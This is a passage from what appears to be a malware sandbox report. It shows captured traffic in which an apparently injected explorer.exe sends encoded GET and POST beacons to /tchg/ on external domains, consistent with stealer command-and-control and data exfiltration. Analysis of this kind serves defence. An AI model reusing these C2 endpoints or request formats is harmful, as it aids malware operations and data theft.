0f 1c 1e 79 ae e1 75 d6 46 f9 eb c1 c1 b7 e2 4d 84 de ae e6 01 ff fb d6 eb 05 59 87 e9 a4 b9 df 1e bf 62 f7 f3 f3 05 3b eb 1a 85 43 e9 d8 83 64 b4 35 f1 5b 07 26 54 57 a4 ef 13 52 64 86 7b 2f 5f 1d 1c 6c 0e fb 79 e7 b0 6f 04 cf d1 59 27 0c 2b 02 f1 c5 11 47 87 3b 47 fc 8b fe af 8d 5c 84 e0 fd 3f 7a fe c5 4a 4c c8 39 2a 19 e5 7e 22 92 bb dc 50 ad d3 be 2c 45 8e c3 da a8 a7 4f a2 24 97 7d db d8 28 ac d9 88 4f b6 57 06 b9 cc 9e 3c 1b ad dd 32 58 21 b7 53 53 f7 b4 51 c8 a2 d5 72 78 fc ed e5 cc c4 e7 4f ab fd 85 1e 78 1e 22 0e df 23 a8 44 9a 4a 9d 0f e1 b0 4d be fd 19 41 a2 50 98 21 33 2d be 75 9a 48 12 32 a9 e4 36 ac c2 81 17 07 3f 8e a0 95 01 bf 3c 67 ec 11 94 52 f7 3b 31 3c ad 5d ea 98 1d 80 a8 1d 8d c0 e1 dc f5 39 c6 9c d7 12 06 47 f3 dd 24 a0 56 70 bf 8e a3 30 73 df 8f 42 bb 51 1e 3d fa 66 04 25 61 db 90 ef 66 51 6d 42 3c ff 71 d3 a2 7f 4d 5a 71 d4 a1 ce ba 30 26 a4 d2 ef d3 56 1c ef 82 80 96 ab 6b 14 93 95 8e 49 26 3b f9 fa 41 83 05 ea 7d 2a 6d a5 44 33 d4 a4 71 b1 99 49 63 79 2b 21 45 66 c8 7d ce 7e f9 e5 e0 60 b1 69 91 ef a6 ab dd a3 c9 f3 17 2f 7e 5d ec ba 42 9a b5 cd c3 17 bf 26 87
                                                                                                                    Data Ascii: RmssgJ&av$NmRmHInM=_cpw~y3(\G(z}[832qQtjEl0;hQoAqK/^zPP`1PP%J^Vyg::<s}k9=v]Ivs8w>;]Np3xyvGe)e,v&FVIJqM3Hhp8(a{8jotEI.6q^>YZQH]rBis_4:Jar!c(j):{{d!5Dh4+k5yUD$wZ}YQO,5I>i6<]2XpCMe^Wh2.|~l'|v,sTWdG'8RFOE>8.V?\~[KJzp=4LB)YyuFMYb;Cd5[&TWRd{/_lyoY'+G;G\?zJL9*~"P,EO$}(OW<2X!SSQrxOx"#DJMAP!3-uH26?<gR;1<]9G$Vp0sBQ=f%afQmB<qMZq0&VkI&;A}*mD3qIcy+!Ef}~`i/~]B&
                                                                                                                    May 30, 2023 11:10:15.548002005 CEST939INData Raw: 2f 56 43 53 84 7b 98 88 e4 2e 37 54 eb b4 bf 38 87 cf fd bf 11 0b 31 29 f2 c2 cf d5 1c 2c 29 99 f2 56 8a 87 e9 e1 08 2a 91 a6 52 e7 43 78 ce 7b 6b 7f 5f d6 68 0b 54 ea fe 21 64 6e 44 33 da c1 62 a2 78 69 04 dd db ac 90 0e bf 1a 78 1c 05 b3 c7 cb
                                                                                                                    Data Ascii: /VCS{.7T81),)V*RCx{k_hT!dnD3bxixqTHr2=-c/7UtoGc-'9_e$'(e66FANz=86CG]__^g^v/o[[iG^6|h7+*(Dk3Aa0;
                                                                                                                    May 30, 2023 11:10:15.548098087 CEST940INData Raw: c9 54 67 1a 30 2b f3 7c c0 9d 7f 7e 40 28 27 a3 a2 c2 c4 c1 7f 48 9c c1 95 9f 7b a1 33 da 0f 6a 73 72 14 8e bf c3 54 0a b8 15 93 4d 85 8f e2 89 a2 e4 ee 73 4d dc 93 44 09 6b 3d bb 14 7b e3 c2 b9 6a 18 2d da 1c 9a 9d e4 b2 6f 1b 1b 85 7c 6d 34 61
                                                                                                                    Data Ascii: Tg0+|~@('H{3jsrTMsMDk={j-o|m4aG+.<W6CYkGm^jTRm=9tMj=;74O'y'*22m=3}J'5Ks]lT:_0Y26F8InG.6_dzUZq4"s5R4=(f'{c8
                                                                                                                    May 30, 2023 11:10:15.548156023 CEST941INData Raw: fb f0 37 a2 52 89 70 e5 1d 57 4f fb 7e a6 e9 fa a0 ae 62 ab 21 d6 2f 10 97 72 01 9f 08 bd 14 f9 40 e3 85 f3 fd ae 88 fb cd ed 6c 9d f6 05 2d 45 03 1a db 0a fb ea 6c 0d 09 c9 f1 51 4b be d9 24 b5 db 67 c9 06 a6 de f8 da b2 59 c2 7a 4b 6f 0b 46 b7
                                                                                                                    Data Ascii: 7RpWO~b!/r@l-ElQK$gYzKoFfKl]DX>+5Oj<u.K!t[EVdpiJ<8)3~(9szG|o(X\v#S3fuHpi"S)*f.Tr#'


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    42192.168.11.2049801162.215.249.4080C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:10:17.733148098 CEST942OUTGET /tchg/?O0qEM=BJuKMup2GV76y7PN1TAAeEW5uAzDipAxIHnNePHx/XVxjn7DTtYSqvDx4g/JiwsgTds8bJvsGAi/M/AJ9Pl0F9zoyJQ+vWMQHA==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1
                                                                                                                    Host: www.roconsultores.com
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                    Data Ascii:
                                                                                                                    May 30, 2023 11:10:17.907572031 CEST943INHTTP/1.1 404 Not Found
                                                                                                                    Date: Tue, 30 May 2023 09:10:17 GMT
                                                                                                                    Server: Apache
                                                                                                                    Upgrade: h2,h2c
                                                                                                                    Connection: Upgrade, close
                                                                                                                    Last-Modified: Tue, 23 Apr 2019 07:54:14 GMT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    Content-Length: 11816
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Content-Type: text/html
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 20 70 72 6f 66 69 6c 65 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 74 69 74 6c 65 3e 0a 0a 09 09 09 09 3c 21 2d 2d 20 41 64 64 20 53 6c 69 64 65 20 4f 75 74 73 20 2d 2d 3e 0a 09 09 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 63 6f 64 65 2e 6a 71 75 65 72 79 2e 63 6f 6d 2f 6a 71 75 65 72 79 2d 33 2e 33 2e 31 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 20 20 20 20 20 20 20 20 0a 09 09 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 63 67 69 2d 73 79 73 2f 6a 73 2f 73 69 6d 70 6c 65 2d 65 78 70 61 6e 64 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 68 65 6c 76 65 74 69 63 61 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 32 30 70 78 20 61 75 74 6f 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 74 6f 70 34 30 34 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 27 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 34 30 34 74 6f 70 5f 77 2e 6a 70 67 27 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 68 65 69 67 68 74 3a 31 36 38 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 6d 69 64 34 30 34 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 27 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 34 30 34 6d 69 64 2e 67 69 66 27 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 72 65 70 65 61 74 2d 79 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 6d 69 64 34 30 34 20 23 67 61 74 6f 72 62 6f 74 74 6f 6d 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 6c 65 66 74 3a 33 39 70 78 3b 66 6c 6f 61 74 3a 6c 65 66 74 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 6d 69 64 34 30 34 20 23 78 78 78 7b
                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head profile="http://gmpg.org/xfn/11"> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>404 - PAGE NOT FOUND</title>... Add Slide Outs --><script src="http://code.jquery.com/jquery-3.3.1.min.js"></script> <script src="/cgi-sys/js/simple-expand.min.js"></script> <style type="text/css"> body{padding:0;margin:0;font-family:helvetica;} #container{margin:20px auto;width:868px;} #container #top404{background-image:url('/cgi-sys/images/404top_w.jpg');background-repeat:no-repeat;width:868px;height:168px;} #container #mid404{background-image:url('/cgi-sys/images/404mid.gif');background-repeat:repeat-y;width:868px;} #container #mid404 #gatorbottom{position:relative;left:39px;float:left;} #container #mid404 #xxx{
                                                                                                                    May 30, 2023 11:10:17.907623053 CEST945INData Raw: 66 6c 6f 61 74 3a 6c 65 66 74 3b 70 61 64 64 69 6e 67 3a 34 30 70 78 20 33 39 37 70 78 20 31 30 70 78 3b 20 6d 61 72 67 69 6e 3a 20 61 75 74 6f 20 61 75 74 6f 20 2d 31 30 70 78 20 61 75 74 6f 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e
                                                                                                                    Data Ascii: float:left;padding:40px 397px 10px; margin: auto auto -10px auto} #container #mid404 #content{float:left;text-align:center;width:868px;} #container #mid404 #content #errorcode{font-size:30px;font-weight:800;} #container
                                                                                                                    May 30, 2023 11:10:17.907661915 CEST946INData Raw: 34 20 23 63 6f 6e 74 65 6e 74 20 23 61 63 63 6f 72 64 69 6f 6e 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 39 35 25 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 6d 69
                                                                                                                    Data Ascii: 4 #content #accordion p {font-size: 95%; text-align: left;} #container #mid404 #content #accordion h3 {font-weight: bold;} #container #mid404 #content #accordion h4 {font-weight: bold; font-style: italic; text-align: left;} .co
                                                                                                                    May 30, 2023 11:10:17.907713890 CEST947INData Raw: 63 61 75 73 65 20 79 6f 75 20 68 61 76 65 20 48 6f 74 20 4c 69 6e 6b 20 50 72 6f 74 65 63 74 69 6f 6e 20 74 75 72 6e 65 64 20 6f 6e 20 61 6e 64 20 74 68 65 20 64 6f 6d 61 69 6e 20 69 73 20 6e 6f 74 20 6f 6e 20 74 68 65 20 6c 69 73 74 20 6f 66 20
                                                                                                                    Data Ascii: cause you have Hot Link Protection turned on and the domain is not on the list of authorized domains.</p><p>If you go to your temporary url (http://ip/~username/) and get this error, there maybe a problem with the rule set stored in
                                                                                                                    May 30, 2023 11:10:17.907758951 CEST949INData Raw: 6e 67 3e 20 69 73 20 69 6d 70 6f 72 74 61 6e 74 20 69 6e 20 74 68 69 73 20 65 78 61 6d 70 6c 65 2e 20 4f 6e 20 70 6c 61 74 66 6f 72 6d 73 20 74 68 61 74 20 65 6e 66 6f 72 63 65 20 63 61 73 65 2d 73 65 6e 73 69 74 69 76 69 74 79 20 3c 73 74 72 6f
                                                                                                                    Data Ascii: ng> is important in this example. On platforms that enforce case-sensitivity <strong>e</strong>xample and <strong>E</strong>xample are not the same locations.</p><p>For addon domains, the file must be in public_html/addondomain.com/ex
                                                                                                                    May 30, 2023 11:10:17.907795906 CEST950INData Raw: 6f 6e 73 2e 3c 2f 70 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 3c 64 69 76 20 69 64 3d 22 77 70 22 3e 0a 09 09 09 09 09 09 3c 68 33 3e 3c 61 20 63 6c 61 73 73 3d 22 65 78 70 61 6e 64
                                                                                                                    Data Ascii: ons.</p></div></div><div id="wp"><h3><a class="expander" href=#>404 Errors After Clicking WordPress Links</a></h3><div class="content"><p>When working with WordPress, 404 Page Not Found errors can
                                                                                                                    May 30, 2023 11:10:17.907839060 CEST951INData Raw: 69 74 20 79 6f 75 72 20 2e 68 74 61 63 63 65 73 73 20 66 69 6c 65 20 64 69 72 65 63 74 6c 79 2e 3c 2f 70 3e 0a 09 09 09 09 09 09 09 09 3c 68 34 3e 3c 75 3e 4f 70 74 69 6f 6e 20 32 3a 20 4d 6f 64 69 66 79 20 74 68 65 20 2e 68 74 61 63 63 65 73 73
                                                                                                                    Data Ascii: it your .htaccess file directly.</p><h4><u>Option 2: Modify the .htaccess File</u></h4><p>Add the following snippet of code<em> </em>to the top of your .htaccess file:</p><div class="code"><p>#
                                                                                                                    May 30, 2023 11:10:17.907885075 CEST953INData Raw: 72 79 20 63 6f 6d 6d 6f 6e 20 64 69 72 65 63 74 69 76 65 73 20 66 6f 75 6e 64 20 69 6e 20 61 20 2e 68 74 61 63 63 65 73 73 20 66 69 6c 65 2c 20 61 6e 64 20 6d 61 6e 79 20 73 63 72 69 70 74 73 20 73 75 63 68 20 61 73 20 57 6f 72 64 50 72 65 73 73
                                                                                                                    Data Ascii: ry common directives found in a .htaccess file, and many scripts such as WordPress, Drupal, Joomla and Magento add directives to the .htaccess so those scripts can function.</p><p>It is possible that you may need to edit the .htaccess
                                                                                                                    May 30, 2023 11:10:17.907924891 CEST954INData Raw: 6e 61 67 65 72 3c 2f 73 74 72 6f 6e 67 3e 20 69 63 6f 6e 2e 3c 2f 6c 69 3e 0a 09 09 09 09 09 09 09 09 09 3c 6c 69 3e 43 68 65 63 6b 20 74 68 65 20 62 6f 78 20 66 6f 72 26 6e 62 73 70 3b 3c 73 74 72 6f 6e 67 3e 44 6f 63 75 6d 65 6e 74 20 52 6f 6f
                                                                                                                    Data Ascii: nager</strong> icon.</li><li>Check the box for&nbsp;<strong>Document Root for</strong> and select the domain name you wish to access from the drop-down menu.</li><li>Make sure&nbsp;<strong>Show Hidden Files (dotfiles)</stro
                                                                                                                    May 30, 2023 11:10:17.907957077 CEST955INData Raw: 20 76 65 72 73 69 6f 6e 20 75 6e 74 69 6c 20 79 6f 75 72 20 73 69 74 65 20 77 6f 72 6b 73 20 61 67 61 69 6e 2e 3c 2f 6c 69 3e 0a 09 09 09 09 09 09 09 09 09 3c 6c 69 3e 4f 6e 63 65 20 63 6f 6d 70 6c 65 74 65 2c 20 79 6f 75 20 63 61 6e 20 63 6c 69
                                                                                                                    Data Ascii: version until your site works again.</li><li>Once complete, you can click&nbsp;<strong>Close</strong> to close the File Manager window.</li></ol></div></div></div></div> </div> <d


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    43192.168.11.204980284.32.84.3280C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:10:23.137608051 CEST956OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.aurizhon.com
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 187
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.aurizhon.com
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.aurizhon.com/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 7e 74 45 75 6c 62 51 4f 56 6c 35 70 6f 76 59 2d 6c 70 6d 6b 64 4d 61 5a 58 34 31 57 71 4f 7e 4f 45 47 52 45 49 76 4b 45 76 6d 61 61 66 37 4a 6e 77 78 51 34 35 4f 67 68 6b 4f 4e 61 49 4a 6a 64 5a 77 76 77 6d 36 4f 53 42 32 75 34 34 56 30 7a 61 5f 57 4c 76 4a 62 38 32 6a 53 74 52 46 6c 33 53 53 35 79 43 55 6f 52 44 77 6b 79 35 35 31 44 68 61 4b 74 34 51 79 51 57 32 46 37 33 56 76 6a 6b 74 53 51 35 44 67 63 62 45 53 5a 65 54 67 74 4e 78 42 31 57 59 4a 52 79 6a 34 6c 34 30 79 79 50 47 53 76 68 39 76 51 6c 6a 72 4f 48 44 57 30 4f 77 29 2e 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii: O0qEM=~tEulbQOVl5povY-lpmkdMaZX41WqO~OEGREIvKEvmaaf7JnwxQ45OghkONaIJjdZwvwm6OSB2u44V0za_WLvJb82jStRFl3SS5yCUoRDwky551DhaKt4QyQW2F73VvjktSQ5DgcbESZeTgtNxB1WYJRyj4l40yyPGSvh9vQljrOHDW0Ow).


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    44192.168.11.204980384.32.84.3280C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:10:25.687167883 CEST957OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.aurizhon.com
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 527
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.aurizhon.com
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.aurizhon.com/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 7e 74 45 75 6c 62 51 4f 56 6c 35 70 75 4c 6b 2d 70 71 7e 6b 63 73 61 47 4a 6f 31 57 39 65 28 4a 45 47 64 45 49 75 50 50 76 51 71 61 59 5a 52 6e 78 77 51 34 77 65 67 68 32 75 4e 62 48 70 6a 57 5a 77 6a 53 6d 5f 32 53 42 32 71 34 37 48 38 7a 4c 5f 57 49 37 35 62 37 78 6a 53 6f 47 31 6c 48 53 54 45 64 43 56 4d 52 44 68 59 79 36 36 64 44 74 75 65 69 70 41 79 53 65 57 46 36 39 31 76 58 6b 74 65 75 35 42 68 6e 62 58 4f 5a 65 7a 41 74 4d 78 42 32 59 6f 4a 63 74 54 35 6b 72 32 6e 72 42 6e 36 74 33 5f 48 30 69 6a 65 46 43 53 4c 50 66 43 68 57 4c 64 72 6f 74 37 50 55 77 33 63 69 4c 61 72 4c 30 5a 73 6a 76 52 32 57 53 67 76 34 37 7a 69 31 43 68 33 6e 72 48 7e 76 43 54 5a 5a 72 36 77 52 28 4d 61 75 36 5a 6f 58 68 35 73 4e 61 53 49 41 39 66 6d 46 56 2d 76 4b 35 67 6b 79 77 43 56 31 63 46 4d 64 61 68 32 66 6d 50 66 30 57 34 4a 76 33 44 4f 76 65 56 6a 6a 6c 4a 7e 69 28 52 4a 49 28 50 63 71 5a 34 56 56 71 54 50 57 6d 4e 37 54 32 68 4a 59 66 31 45 75 6c 7a 51 67 69 48 45 6a 4a 64 7a 4c 41 33 43 46 70 43 53 69 4e 51 53 4e 37 59 56 32 34 33 57 45 4d 4e 70 6a 70 31 48 47 39 6e 47 39 42 4c 4c 2d 54 56 45 71 36 35 62 74 68 6a 5a 43 61 71 78 71 71 5a 36 78 75 70 6d 6e 7a 4c 50 71 4f 70 44 61 45 75 6d 43 6e 59 63 6a 5a 78 30 47 59 6b 65 7a 54 41 43 32 73 31 51 66 6b 37 76 45 64 75 38 72 54 76 4d 74 79 58 44 46 4f 4f 38 74 71 6f 55 49 58 44 46 47 4d 59 61 4c 70 33 5a 53 33 61 64 6b 4f 38 51 53 76 63 32 6e 6d 45 68 4a 69 46 7e 68 70 4d 4e 44 38 6a 50 5a 4c 71 55 62 45 49 47 2d 6f 61 64 4d 37 63 62 33 65 68 7a 68 4d 46 7a 45 32 35 51 63 35 33 43 42 31 31 55 2e 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii: O0qEM=~tEulbQOVl5puLk-pq~kcsaGJo1W9e(JEGdEIuPPvQqaYZRnxwQ4wegh2uNbHpjWZwjSm_2SB2q47H8zL_WI75b7xjSoG1lHSTEdCVMRDhYy66dDtueipAySeWF691vXkteu5BhnbXOZezAtMxB2YoJctT5kr2nrBn6t3_H0ijeFCSLPfChWLdrot7PUw3ciLarL0ZsjvR2WSgv47zi1Ch3nrH~vCTZZr6wR(Mau6ZoXh5sNaSIA9fmFV-vK5gkywCV1cFMdah2fmPf0W4Jv3DOveVjjlJ~i(RJI(PcqZ4VVqTPWmN7T2hJYf1EulzQgiHEjJdzLA3CFpCSiNQSN7YV243WEMNpjp1HG9nG9BLL-TVEq65bthjZCaqxqqZ6xupmnzLPqOpDaEumCnYcjZx0GYkezTAC2s1Qfk7vEdu8rTvMtyXDFOO8tqoUIXDFGMYaLp3ZS3adkO8QSvc2nmEhJiF~hpMND8jPZLqUbEIG-oadM7cb3ehzhMFzE25Qc53CB11U.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    45192.168.11.204980484.32.84.3280C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:10:28.234545946 CEST959OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.aurizhon.com
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 51815
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.aurizhon.com
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.aurizhon.com/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 7e 74 45 75 6c 62 51 4f 56 6c 35 70 75 4c 6b 2d 70 71 7e 6b 63 73 61 47 4a 6f 31 57 39 65 28 4a 45 47 64 45 49 75 50 50 76 51 69 61 66 71 5a 6e 33 54 6f 34 69 4f 67 68 31 75 4e 65 48 70 6a 50 5a 77 37 57 6d 5f 4c 6e 42 30 43 34 7e 45 45 7a 4c 71 69 49 77 5a 62 2d 38 7a 53 75 52 46 6c 70 53 53 35 63 43 56 6f 72 44 77 73 79 35 34 46 44 67 35 69 74 31 41 79 51 65 57 46 2d 71 6c 76 31 6b 74 62 31 35 42 39 6e 62 56 4b 5a 4d 77 34 74 41 47 56 32 56 59 4a 64 6a 7a 35 33 38 6d 6e 6f 42 6e 75 66 33 5f 48 4f 69 6d 36 46 43 53 72 50 4e 42 35 5a 4c 39 72 6f 6c 62 50 58 30 33 42 72 4c 65 4b 59 30 61 77 6a 76 57 4b 57 53 41 76 34 28 57 4f 79 42 42 33 68 68 6e 7e 30 47 54 56 72 72 36 4e 6f 28 4a 43 75 39 6f 4d 58 67 49 73 4e 59 33 38 41 7a 66 6d 62 49 75 75 41 76 51 6b 75 77 47 77 63 63 47 56 71 61 6a 36 66 6c 75 28 30 47 4a 49 35 6c 6a 50 71 43 46 69 68 68 49 43 2d 28 52 35 55 28 50 63 36 5a 36 35 56 70 6a 28 57 30 4a 76 51 37 52 4a 68 5a 31 46 36 72 54 63 75 69 45 77 72 4a 64 62 62 41 32 4b 46 76 69 53 69 4a 33 4f 4b 68 59 56 39 77 58 58 5a 43 74 6f 31 70 31 4b 76 39 6d 44 49 42 34 50 2d 53 6c 55 71 28 70 62 71 6e 44 5a 47 56 4b 78 77 75 5a 36 78 75 70 71 7a 7a 4c 54 71 4f 59 72 61 43 63 7e 43 69 4a 63 6a 62 78 30 4d 59 6b 65 69 54 41 4f 46 73 31 70 2d 6b 34 48 71 64 73 51 72 54 37 6f 74 7a 6d 44 4b 62 75 38 6f 75 6f 55 54 59 6a 42 33 4d 59 47 54 70 33 4a 73 33 74 4e 6b 41 63 41 53 7e 4d 32 6b 74 45 68 4f 79 56 28 36 74 4d 51 61 38 6a 54 4a 4c 70 4a 44 45 50 36 2d 70 4e 51 6e 70 59 76 30 48 33 75 49 50 7a 33 44 7a 4a 51 78 76 31 36 64 6a 68 53 42 49 31 58 4a 49 63 50 42 4e 72 4f 2d 35 39 7e 4c 4e 64 65 43 36 59 31 4d 47 49 31 6e 28 39 59 77 6e 35 75 41 61 39 4d 5f 71 45 46 51 4a 66 35 6d 6c 2d 52 4e 78 41 30 56 4b 77 30 34 46 63 35 73 53 62 4d 36 38 71 64 58 4c 6d 4a 7a 38 73 30 70 73 45 30 64 77 58 4a 70 47 4d 39 67 66 32 73 56 4b 6a 42 33 56 76 38 49 7e 36 70 42 4b 6e 37 69 30 50 45 59 6b 52 4e 52 76 31 43 67 61 31 6f 4c 31 51 6d 37 59 32 56 76 72 71 71 42 63 66 36 2d 64 2d 32 38 66 63 56 71 4a 42 77 7a 46 48 52 46 33 75 68 64 54 55 77 5a 70 52 56 79 64 5f 61 57 4f 6d 58 38 76 43 76 68 6e 58 4a 4e 7e 67 6d 6e 55 46 37 6f 73 79 61 65 32 52 65 51 36 71 6c 30 34 46 37 74 51 38 31 44 4f 63 55 6b 38 6b 64 70 61 51 5a 71 36 79 53 49 6a 72 78 45 50 4c 55 56 77 57 50 6c 55 71 70 47 50 37 5a 73 63 72 52 42 6a 6b 56 51 34 59 32 68 4f 77 53 41 75 45 44 73 6b 75 7e 4b 6c 39 58 41 39 50 67 37 33 65 72 52 58 53 37 32 6e 7a 31 49 54 31 64 43 44 37 54 4b 77 5f 6f 67 77 77 43 70 4c 75 31 6f 44 32 36 7a 4b 65 33 69 72 41 45 79 55 46 39 58 43 32 38 49 4c 76 70 52 55 50 4a 71 71 46 32 75 4b 57 6d 4a 61 51 7a 56 38 46 75 6e 57 43 59 7a 44 56
